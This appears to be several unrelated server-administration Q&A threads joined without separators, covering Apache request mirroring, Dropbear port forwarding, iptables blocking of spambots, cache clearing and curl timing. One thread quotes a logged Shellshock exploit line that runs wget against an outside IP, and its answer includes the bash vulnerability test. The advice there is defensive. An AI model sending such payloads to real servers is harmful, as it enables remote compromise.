I have a busy web server running Apache. I am interested in certain requests, like:
http://myserver1/path1/somepage1.html?xxxxxx
http://myserver1/path2/somepage2.html?xxxxxx
What I want to do is duplicate requests like these and forward them to another web server, like:
http://myserver2/request_statistic/
But the original requests must still be served on myserver1 as they are now. myserver2 is only for research purposes, so I want the duplicated request headers and bodies to be exactly like the originals.
Can this be done? How?
Thank you.
Where would the response go?
You might try looking at mod_security, which has a number of features that could help here... is your goal security/forensics, or performance analysis?
For performance analysis, I've found it more useful in the past to create a more comprehensive logging format that captures things like response-code, response Location header (for tracking redirects), selected request headers, timing information, etc.
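As a rough sketch (the directives are standard Apache ones, but the exact set of fields here is only an illustration, not a recommendation), such a format might look like:
# status, bytes, time taken in microseconds, Location response header, Referer and User-Agent request headers
LogFormat "%h %l %u %t \"%r\" %>s %b %D \"%{Location}o\" \"%{Referer}i\" \"%{User-Agent}i\"" research
CustomLog logs/research_log research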
If https is not in use, then you might be better served by something driven by packet-capture. I know that Oracle Real User Information (?) (RUI) works using that principle. For more casual diagnostic sessions, I've often gotten away with the following tcpdump:
tcpdump -s0 -A -p -nn tcp and port 80
That's enough to get the full requests (and responses); it is a little messy, but the data is all there. You can clean it up a bit with a script such as the following (tcpdump-http-headers-only) -- it's not perfect (particularly on a busy server, where things get harder to track).
#!/bin/bash
#
# Pass in the output of 'tcpdump -s0 -A ...' to this and it will
# output only the HTTP request headers and response headers.
#
# Cameron Kerr <cameron.kerr.nz#gmail.com>
# 2013-02-14
#
grep --line-buffered -o \
-e $'GET .*\r' \
-e $'POST .*\r' \
-e $'^[A-Z][A-Za-z0-9_-]*: .*\r' \
-e $'HTTP/1.1 .*\r' \
-e $'^\r$' \
| sed --unbuffered -e 's,\r$,,'
Alternatively, you might like to capture the traffic to files (perhaps in conjunction with the -W, -C or -G options) for later analysis. Depending on the cipher used, this can also work with https connections if the key is provided (useful for Wireshark).
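For example (a sketch only; the file name, interval and file count are arbitrary), a rotating capture for later analysis might look like:
# write full packets to timestamped files, starting a new file every 300 seconds,
# and stop after 12 files (roughly an hour of traffic)
tcpdump -s0 -nn -w '/var/tmp/http-%Y%m%d-%H%M%S.pcap' -G 300 -W 12 tcp and port 80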
I have been using OpenSSH for a little bit and just learned the basics of port forwarding in OpenSSH. I own some equipment that has Dropbear installed on it, but it seems the options are different. The equipment has an internal webpage operating on port 443 and I would like to forward that to another PC securely.
Port forwarding requires the SSH client and SSH server to interoperate, and of course the feature must be present and allowed in both. At build time, Dropbear has four distinct settings for this:
#define DROPBEAR_CLI_LOCALTCPFWD 1
#define DROPBEAR_CLI_REMOTETCPFWD 1
#define DROPBEAR_SVR_LOCALTCPFWD 1
#define DROPBEAR_SVR_REMOTETCPFWD 1
These are all set by default in the official (current dropbear-2022.82) source. AFAICT every public release since 2003 has had some form of TCP forwarding support (but not necessarily enabled when it was built).
Usefully, these options control both the feature itself, and whether the feature is documented in the -h help output—if the relevant options are omitted from the help output then they were omitted from the build.
With the Dropbear server, you should be able to run dropbear -h (or sshd -h if it has been renamed); the presence of the -j and/or -k options indicates that DROPBEAR_SVR_LOCALTCPFWD and DROPBEAR_SVR_REMOTETCPFWD, respectively, were set at build time.
With the Dropbear client, you should run dbclient -h (or ssh -h); the presence of the -L and/or -R options indicates that DROPBEAR_CLI_LOCALTCPFWD and DROPBEAR_CLI_REMOTETCPFWD, respectively, were set at build time.
(If the binaries were renamed you can confirm their identity with the -V option.)
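A quick way to check (just a sketch; the help text may be printed on stderr and its exact formatting varies between Dropbear versions):
# server side: -j and -k only appear in the usage output if the SVR forwarding options were built in
dropbear -h 2>&1 | grep -e '-j' -e '-k'
# client side: likewise for -L and -R
dbclient -h 2>&1 | grep -e '-L' -e '-R'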
Finally, the Dropbear server must be started without the -j or -k options in order for it to honour client requests for local and remote forwarding, respectively.
If all of the above is as expected (specifically the capabilities and run-time options of the target system's Dropbear SSH server), you should then be able to do something like one of:
ssh -L10443:127.0.0.1:443 dropbearhost
ssh -L10443:x.x.x.x:443 dropbearhost
where localhost:10443 (e.g. https://localhost:10443/) on the initiating system will forward to 127.0.0.1:443 on dropbearhost (or to x.x.x.x:443 if the web server is bound to a specific alternate address). If SNI is enforced, then adding the virtual host name to the hosts file on the initiating system should fix that (and might also be required if the web content uses redirects).
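For example (the host name is purely hypothetical), an entry like the following in the initiating system's hosts file points the virtual host name at the local end of the tunnel, so that https://secure.example.internal:10443/ presents the expected SNI name:
127.0.0.1   secure.example.internal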
If you happen to be building Dropbear yourself, you can change those build options by hand after running configure:
grep TCPFWD default_options.h >> localoptions.h
and then amend it, setting them to 0 or 1 as required. (Note, though, that in older versions these defines were named, set and used slightly differently.)
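The resulting localoptions.h might then look something like this (a hypothetical example that keeps forwarding in the client but disables it in the server):
#define DROPBEAR_CLI_LOCALTCPFWD 1
#define DROPBEAR_CLI_REMOTETCPFWD 1
#define DROPBEAR_SVR_LOCALTCPFWD 0
#define DROPBEAR_SVR_REMOTETCPFWD 0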
We have just moved our web apps to a self-hosted site on DigitalOcean, vs our previous web host. The instance is getting hammered with requests according to New Relic, but we are seeing very few page views. Throughput is around 400 rpm, whereas we only have about 1 page view per minute.
When I look at the access log, it is getting hammered with what I am guessing are spambots trying to access a nonexistent downloads folder. It's causing my CPU to run at 95%, even though nothing is actually happening.
How can I stop this spamming access?
So far I have created a downloads folder and put a Deny All in an .htaccess file in it. That appeared to cool things down, but now it's getting worse again (hence the desperate post).
Find a pattern in the malevolent requests and restrict the IPs they are coming from.
Require a hashed header to be provided with each request to verify the identity of the person/group wanting access.
Restrict more than N downloads from any IP over an M time threshold (see the sketch after this list).
Distribute traffic load via DNS proxying to multiple hosts/web servers.
Switch to NGINX. NGINX is more performant than Apache in most cases with high levels of requests. See DigitalOcean's article --> https://www.digitalocean.com/community/tutorials/apache-vs-nginx-practical-considerations.
Make sure your firewall employs a whitelist of hosts/ports, NOT *.
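A rough sketch of the per-IP rate-limit idea using iptables' recent module (the thresholds are arbitrary; tune them to your real traffic):
# track new connections to port 80 per source IP
iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --set --name HTTP
# drop any source that opens more than 20 new connections within 60 seconds
iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 60 --hitcount 20 --name HTTP -j DROP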
I'd use iptables to drop any connections from the spam bot IP addresses.
Find which IPs are connected to your Apache server:
netstat -tn 2>/dev/null | grep :80 | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr | head
You should get something like:
20 49.237.134.0
15 166.137.246.0
10 31.187.6.0
Once you find the bot IP addresses (probably the ones with the higher number of connections), use iptables to DROP further connections from them:
iptables -A INPUT -s 49.237.134.0 -p tcp --destination-port 80 -j DROP
iptables -A INPUT -s 31.187.6.0 -p tcp --destination-port 80 -j DROP
iptables -A INPUT -s 166.137.246.0 -p tcp --destination-port 80 -j DROP
Note:
Make sure you're not dropping connections from search engine bots like Google, Yahoo, etc.
You can use www.infobyip.com to get detailed information about a specific IP address.
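As a quick sanity check (the address below is only an example), a reverse DNS lookup will usually reveal a legitimate crawler, e.g.:
host 66.249.66.1
A genuine Googlebot address resolves to a *.googlebot.com name, and a forward lookup of that name should point back to the same address.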
How can I clear the Apache cache in XAMPP?
I tried the 'htcacheclean -r' command, but it always generates an error.
As far as I know, Apache doesn't cache files/scripts, but a system administrator said this: 'Apache is caching the site, so clear the Apache(!) cache.'
Take a look at this:
Use mod_cache at http://httpd.apache.org/docs/2.0/mod/mod_cache.html
CacheDisable /local_files
Description: Disable caching of specified URLs
Syntax: CacheDisable url-string
Context: server config, virtual host
Try this if the others are not working:
htcacheclean -p C:\xampp\htdocs\yourproject -rv -L 1000M
This way, you specify the path explicitly with -p rather than expecting XAMPP to find it.
-r = Clean thoroughly. This assumes that the Apache web server is not running. This option is mutually exclusive with the -d option and implies -t.
-v = Be verbose and print statistics. This option is mutually exclusive with the -d option.
-L 1000M = Specify LIMIT as the total disk cache inode limit (in megabytes).
I'm running several virtual hosts on Apache 2.2.22 and just noticed a rather alarming incident in the logs, where a "security scanner" from Iceland was able to wget a file into a cgi-bin directory with the following HTTP request line:
() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"
It effectively downloaded the file in question.
Could anyone explain how this request manages to actually execute the bash command?
Naturally, the cgi-bin shouldn't be writable, but it would still be helpful to understand how this type of exploit functions, and whether there is some way to change the Apache configuration parameters so that such request commands are never executed ...
This may be unrelated, but several hours later, there has begun a stream of strange requests from the internal interface, occurring every 2 seconds:
host: ":443" request: "NICK netply" source ip: 127.0.0.1
This is a vulnerability in bash, exposed via Apache, referred to as "Shellshock" or the "bash bug". It allows an attacker to execute arbitrary commands both locally and remotely, making it a very serious vulnerability.
You need to update bash, but you are showing signs of an already compromised system. For more information on shellshock including detection and fixing, see:
digitalocean.com
shellshocker.net
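As a quick local check, the test that was widely circulated at the time prints "vulnerable" on an unpatched bash (the echoed strings themselves are arbitrary):
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If bash has been fixed, only the "this is a test" line is printed.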
Currently, I'm making curl calls, checking the response, and sometimes doing a "ssh HOSTNAME "tail -f LOGFILE" | grep PATTERN". Is there a tool out there that streamlines/generalizes this process of making a request and checking both the response and the server logs for certain patterns? (Oh, and getting statistics like response time would be a plus.)
I've only got an answer to part of your question. To get good stats out of cURL, try something like this:
curl -w '\nLookup time:\t%{time_namelookup}\nConnect time:\t%{time_connect}\nPreXfer time:\t%{time_pretransfer}\nStartXfer time:\t%{time_starttransfer}\n\nTotal time:\t%{time_total}\n' -o /dev/null -s http://www.google.com/